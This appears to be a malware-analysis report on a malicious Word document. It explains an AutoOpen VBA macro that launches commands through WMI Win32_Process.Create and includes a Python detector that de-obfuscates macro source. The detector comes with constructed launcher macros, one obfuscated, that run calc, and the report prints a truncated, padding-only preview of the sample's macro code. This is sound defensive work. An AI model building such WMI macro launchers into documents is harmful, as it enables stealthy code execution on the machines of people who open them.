Verdict: MALICIOUS (risk score 242)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document carrying a VBA project whose autoopen subroutine runs as soon as the document is opened with macros enabled. The macro resolves a WMI moniker for the Win32_Process class through GetObject and calls .Create on it to start a command, a common way to execute arbitrary code or fetch a second-stage payload. Because the child process is spawned by the WMI provider host (WmiPrvSE.exe) rather than by WINWORD.EXE, detection rules that only watch for Office spawning a shell will miss it; look for WmiPrvSE.exe children created shortly after a document open, or for the winmgmts: moniker in macro telemetry. The visible part of the recovered module is padding: comparisons between variables that are never assigned, Select Case blocks over constants, and a tautology such as If 8300 < 90525; the launcher logic sits further down in the truncated source. Together with the legacy WordBasic auto-exec marker, the WMI process-creation heuristic makes the malicious intent clear.
Heuristics (7)

- ClamAV: Doc.Malware.00536d-6942037-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.00536d-6942037-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). The document contains VBA macro code.
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE). The VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain; samples often hide the WMI class name through string concatenation or helper functions, so a static match on the literal "Win32_Process" is not enough on its own.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN). The macro runs automatically when the document is opened with macros enabled.
- GetObject call (high, OLE_VBA_GETOBJ). The macro calls GetObject, the usual way a macro resolves a WMI moniker such as winmgmts: into an object it can call .Create on.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. This finding's own description states that no modern VBA project was recovered and no stronger macro-virus family marker was present; that conflicts with the macros.bas artifact below, so treat the marker as analyst-facing corroboration of old Word macro execution surface, not as a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace identifier that ordinary Office files carry; it is not a network indicator for this sample.
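As an added example (not the analyzer's own heuristic code), the following Python detector shows what the OLE_VBA_WMI_PROCESS_CREATE finding above is looking for in decoded macro source, including the concatenation, Chr() and helper-variable tricks the finding text says are used to hide the class name. The three macro snippets are constructed for the example and are not taken from this sample; normalize_vba, analyze_macro and the indicator names are the example's own assumptions.

```python
"""Detect the VBA -> WMI Win32_Process.Create launcher chain in decoded macro
source. Added example, not the analyzer's heuristic implementation. It assumes
the macro text has already been decoded (e.g. by olevba) and applies a small
string de-obfuscation pass before matching, because samples hide "winmgmts:"
and "Win32_Process" behind & / + concatenation, Chr() calls and variables."""
import re

# Constructed sample macros for the example (not from the analysed file).
DIRECT = r'''
Sub AutoOpen()
    Set objWMI = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
    objWMI.Create "cmd.exe /c calc.exe", Null, Null, pid
End Sub
'''

OBFUSCATED = r'''
Sub autoopen()
    a = "winmg" & "mts:"
    b = "Win32" + "_Pro" & "cess"
    Set o = GetObject(a & "\\.\root\cimv2:" & b)
    o.Create Chr(99) & Chr(109) & Chr(100) & ".exe", Null, Null, p
End Sub
'''

BENIGN = r'''
Sub AutoOpen()
    ActiveDocument.Range.Text = "Hello"
End Sub
'''

_STR = r'"(?:[^"]|"")*"'                       # VBA literal; "" is an escaped quote
_CHR = re.compile(r'\bChrW?\$?\(\s*(\d+)\s*\)', re.I)
_CONCAT = re.compile(r'"((?:[^"]|"")*)"\s*[&+]\s*"((?:[^"]|"")*)"')
_ASSIGN = re.compile(r'^[ \t]*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*"((?:[^"]|"")*)"[ \t\r]*$',
                     re.I | re.M)
_TOKEN = re.compile(_STR + r'|[A-Za-z_]\w*|\s+|.', re.S)

_MONIKER = re.compile(r'winmgmts:', re.I)
_CLASS = re.compile(r'\bWin32_Process\b', re.I)
_GETOBJ = re.compile(r'\bGetObject\s*\(', re.I)
_CREATE = re.compile(r'\.\s*Create\b', re.I)          # .Create, not .CreateObject
_CREATE_CMD = re.compile(r'\.\s*Create\s*\(?\s*"((?:[^"]|"")*)"', re.I)
_AUTOEXEC = re.compile(r'\bSub\s+(AutoOpen|Auto_Open|AutoExec|Document_Open|Workbook_Open)\b',
                       re.I)


def _join_literals(src: str) -> str:
    """Fold "a" & "b" and "a" + "b" into "ab" until nothing changes."""
    while True:
        new = _CONCAT.sub(r'"\1\2"', src)
        if new == src:
            return src
        src = new


def _inline_constants(src: str) -> str:
    """Replace identifiers bound to a plain string literal with that literal."""
    consts = {m.group(1).lower(): m.group(2) for m in _ASSIGN.finditer(src)}
    if not consts:
        return src
    out = []
    for m in _TOKEN.finditer(src):
        tok = m.group(0)
        if tok[0] != '"' and tok.lower() in consts:   # never touch string bodies
            tok = '"%s"' % consts[tok.lower()]
        out.append(tok)
    return ''.join(out)


def normalize_vba(src: str, rounds: int = 4) -> str:
    """Undo the cheap obfuscations: line continuations, Chr(n), literal
    concatenation and helper variables holding a literal. A few rounds are
    enough for chains like a = "x" & "y": Set o = GetObject(a & b)."""
    src = re.sub(r'[ \t]+_[ \t]*\r?\n', ' ', src)
    src = _CHR.sub(lambda m: '"%s"' % chr(int(m.group(1))).replace('"', '""'), src)
    for _ in range(rounds):
        before = src
        src = _join_literals(_inline_constants(_join_literals(src)))
        if src == before:
            break
    return src


def analyze_macro(src: str, deobfuscate: bool = True) -> dict:
    """Return the individual indicators plus the combined launcher verdict:
    Win32_Process reached through a WMI moniker or GetObject, with .Create
    invoked on the result. 'command' is the recovered first argument."""
    text = normalize_vba(src) if deobfuscate else src
    cmd = _CREATE_CMD.search(text)
    r = {
        'autoexec': bool(_AUTOEXEC.search(text)),
        'getobject': bool(_GETOBJ.search(text)),
        'wmi_moniker': bool(_MONIKER.search(text)),
        'win32_process': bool(_CLASS.search(text)),
        'create_call': bool(_CREATE.search(text)),
        'command': cmd.group(1).replace('""', '"') if cmd else None,
    }
    r['wmi_process_launcher'] = (r['win32_process'] and r['create_call']
                                 and (r['wmi_moniker'] or r['getobject']))
    return r


if __name__ == '__main__':
    for name, macro in (('direct', DIRECT), ('obfuscated', OBFUSCATED), ('benign', BENIGN)):
        print(name, analyze_macro(macro))
```

Running the obfuscated snippet with deobfuscate=False shows why the normalization pass matters: the literal Win32_Process never appears in the raw text, so a plain string match reports nothing, while the same input after normalization yields the full chain and the recovered command line.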
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29989 bytes | b74fbbeda974d5fcc23d20cda08cb24c30d933113cf4ae9683d06480c9c8bcb7 |
Preview (first 1,000 lines of the extracted script; the listing below is cut off before the end):

```vba
Attribute VB_Name = "NxAGDB11"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zBAkCAw"
Attribute VB_Base = "0{6E9BFDDD-6AD6-4925-917E-79F61DB24CE4}{90AC1B49-7801-435B-AF7D-E652FD62080D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "jAAAADAA"
Attribute VB_Base = "0{FDD289FE-CFDB-4119-98D0-243BABC069B8}{4173F391-F101-4438-A999-4C9EB3150D3D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "AcAAA_A"
Sub autoopen()
If JAkQU1A = k_ACQQo Then
Select Case zxwcA_A
Case 813948465
z4Qo4AD = Rnd(CQoQA_U + 299388730 + 18960693 / dUxkBQ)
uGkoUA = CByte(IBXAUAAA + 725905673 + PQDA4AB + 923829418)
Case 281983548
QA_o_cA = kQAwAAA
YAUZ1BU = Tan(bABAowQ - CSng(tAGADA4))
End Select
End If
If wDkcAAA = AADQUA4B Then
Select Case DUDBAAcU
Case 418679803
bUUQAU = Rnd(iAADAo + 917057834 + 256549040 / R_oBADC)
aAAwxoAZ = CByte(nAA4AB_A + 330315580 + lAQxDDAc + 960767382)
Case 59995169
iZAQXo = T11_DDB
PXAwkQUA = Tan(qBQAoCcG - CSng(DAABx1UD))
End Select
End If
DxxkQAA
If fZGBAAUB = dCAxD4B Then
Select Case nXXADAQ
Case 635280604
S4kxAA = Rnd(kAkDDBxZ + 391625815 + 497833329 / SBDBcA)
OAo1AA = CByte(YCAGxAoA + 267638673 + fAoC1A + 479574850)
Case 871518449
cxQoAZ_ = c_A1AAX4
wA14QAB = Tan(iCAAAw - CSng(bQk1Ao_B))
End Select
End If
If z_AUAcAU = iwQ1UGA Then
Select Case hAcDDC
Case 44442605
ODC4oBBx = Rnd(S1Q1oCk + 816044242 + 684342563 / vUGGA1x)
XxUxDBUc = CByte(XDDUAokk + 90673243 + GDA1DU1A + 538268837)
Case 558805638
ZDA4ZX1B = AQwBGAA
wGBAGA = Tan(sDDBkAAo - CSng(PAAQBBG))
End Select
End If
End Sub
Attribute VB_Name = "pxQkAU"
Function DxxkQAA()
On Error Resume Next
If M_xZ1Qx = RoAAxw Then
Select Case qkDcwo
Case 179014830
ikUDk_A = Rnd(lAUZA1A + 599922612 + 958408624 / mAAkwk)
XxBBAcX = CByte(IwAAAQZ + 801652821 + PDAAAw + 890144142)
Case 590039148
OBckDc = wcQ4UA
cAAAUADA = Tan(OUA4QDo - CSng(Qw1AAA))
End Select
End If
If jDD_kQ4 = FXABAw Then
Select Case mAAAw4o
Case 842408286
vXAQ4cQA = Rnd(kUAA_GC + 256575474 + 688930360 / lA1x1CcU)
fAUGAQD = CByte(qAAQAx + 890827162 + dAAABAXk + 48496232)
Case 752266333
nw1ADA = kA4GZA
PAcUox = Tan(s_wBZAU4 - CSng(CBAUBk))
End Select
End If
If 8300 < 90525 Then
ko14UxUA = vbFalse
If dBBAAUAo = LAoXok_A Then
Select Case AAAoA1
Case 540593426
JDAoA1 = Rnd(voA_BU + 314301628 + 758805090 / BoAAQQ)
hGCXQo4B = CByte(zA4AQoQ + 388181911 + Iw4kAcZA + 762934153)
Case 267103723
RAAGAUD = zQAAAUkD
HQUAADB = Tan(S_DAx_k - CSng(rAAxDc))
End Select
End If
If i_UUZA = MAwwAB Then
Select Case mo4wBC_
Case 903483643
aAQAZQZ = Rnd(wcAGc1UQ + 500751947 + 728720609 / f__ABA1)
zZAxCBB = CByte(lA_AQ_1X + 624026011 + VcXBkAA1 + 112852857)
Case 649463829
zAcZxA = HAGxUoC
BGAUQA = Tan(iAxBAG - CSng(dQUQC1))
End Select
End If
If AAAGUUBB = CkQUAAD Then
Select Case XAQA1_
Case 91009947
o
```

... (truncated)